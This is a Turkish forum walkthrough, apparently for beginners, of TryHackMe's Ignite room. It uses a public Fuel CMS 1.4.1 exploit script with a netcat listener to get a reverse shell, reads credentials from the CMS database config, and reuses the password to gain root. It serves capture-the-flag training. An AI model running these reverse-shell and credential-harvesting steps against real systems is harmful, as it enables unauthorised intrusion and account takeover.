TryHackMe - Ignite Walkthrough
Fuel CMS 1.4.1 | Initial Access → Privilege Escalation → Root
Merhaba WarNight üyeleri,
Bu konuda TryHackMe platformundaki Ignite odasının çözümünü adım adım inceleyeceğiz. Makine üzerinde ilk erişimi elde ettikten sonra kullanıcı flag'ını alacak, ardından yetki yükselterek root olacağız.
Bu rehber başlangıç seviyesindeki kullanıcıların da rahatlıkla takip edebileceği şekilde hazırlanmıştır.
Root It
Hedefe İlk Bakış
İlk olarak verilen IP adresini tarayıcıda açıyoruz.

Sayfayı incelediğimizde sitenin Fuel CMS 1.4.1 kullandığını görüyoruz.
Bu bilgi oldukça önemli çünkü sürüm bilgisi doğrudan zafiyet araştırması yapmamıza imkan sağlar.
[INFO]
İpucu
Google'da;
Fuel CMS 1.4.1 exploit
şeklinde arama yaptığınızda birden fazla sonuç göreceksiniz.
[/INFO]

Ben bu makalede GitHub üzerindeki güncel exploit'i kullanacağım.
Exploit'i Çalıştırma
Önce listener açıyoruz.
Bash:
nc -lvnp 1337
Ardından exploit'i çalıştırıyoruz.
Bash:
python3 Fuel-Updated.py http://TARGET_IP YOUR_IP 1337

Shell bağlantısı geldikten sonra TTY yükseltiyoruz.
Bash:
export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ardından User Flag'i okuyabiliriz.
Bash:
cat /home/www-data/flag.txt

[SUCCESS]
İlk flag başarıyla elde edildi.
[/SUCCESS]
Root Yetkisi Alma
Fuel CMS yapılandırma dosyasında veritabanı bilgileri tutulmaktadır.
Bash:
cd fuel/application/config
cat database.php

Dosya içerisinde kullanıcı adı ve parola bilgileri yer almaktadır.
Bu bilgileri kullanarak root kullanıcısına geçiyoruz.
Bash:
su
Password:
mememe
Son olarak root flag'ını okuyoruz.
Bash:
cat /root/root.txt


Bir sonraki TryHackMe çözümünde görüşmek üzere.